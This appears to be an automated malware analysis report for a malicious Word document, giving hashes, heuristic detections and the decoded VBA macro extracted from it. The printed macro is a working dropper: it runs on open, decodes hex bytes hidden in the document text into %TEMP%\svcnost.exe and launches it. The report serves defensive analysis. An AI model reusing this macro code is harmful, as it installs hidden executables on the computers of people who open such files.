Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 d2d1f95cdcc9d7da…

MALICIOUS

Office (OLE) / .DOC

Size: 112.0 KB
Created: 2014-12-13 02:32:00
Authoring application: Microsoft Office Word
First seen: 2026-06-14
MD5: 228d8eba7a536ad93ee556ce089b02e0
SHA-1: a16366b69fe715fac753a2bbedb132192e685c0f
SHA-256: d2d1f95cdcc9d7da45ad25cb61fe51c1dd22173576084051933760cc4c8615a4
214 Risk Score

Heuristics 10

  • ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell utututut, iR3t + 1 - 1
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    tmm1 = Environ("T" & strTitle)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename    Kind       Source                                               Size
macros.bas  vba-macro  oletools.olevba.extract_macros (decoded VBA source)  1586 bytes
SHA-256: 9bea84b68819b55860b13a12342e7b040182f449e392137adba8e1158fb07991
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub Auto_Open()
   networkk
End Sub
Sub AutoOpen()
   Auto_Open
End Sub
Sub Workbook_Open()
   Auto_Open
End Sub

Sub networkk()
Dim zzzzz
zzzzz = "sdfs4738946789045643728945764738495864378467fsd"
Dim tmm1
Dim t7nb
Dim bywr
Dim li7np9f
Dim iR3t As Integer
Dim strPrompt As String
Dim strTitle As String
Dim ddddd
ddddd = ActiveDocument.Range.Text
strPrompt = "fsgsrg343454t4t rga dfgs3dfgsdf g" & "fa44tggsr3tsdgsg fgs fsgdf"
strTitle = "sdfgsr3333edfgsdf324234"
strTitle = "E" & "M" & "P"
tmm1 = Environ("T" & strTitle)
strTitle = "x" & "e"
t7nb = tmm1 & "sv" & "c" & "no" & "st.e" & strTitle

Dim Data
Data = Replace(ddddd, " ", "1")
zzzzz = "sdfs4738946789045643728945764738495864378467fsd"
Dim sop
Dim sop22
Dim Symbol
Dim utututut
Dim byswr

strTitle = "8"
sop = InStr(12, Data, "5" & "67" & strTitle)
sop22 = InStr(12, Data, "99" & "997" & strTitle)
byswr = sop + 2 + 22 - 20

i7np9f = FreeFile
Open t7nb For Binary Lock Write As #i7np9f

While (byswr < sop22)
Symbol = Mid(Data, byswr, 902 - 900)
zzzzz = "123123123123"
strTitle = "H"
Put #i7np9f, , CByte("&" & strTitle & Symbol)
byswr = byswr + 5 - 3
Wend
iR3t = 1
Close #i7np9f
utututut = t7nb
Shell utututut, iR3t + 1 - 1

End Sub

Private Sub Document_New()

End Sub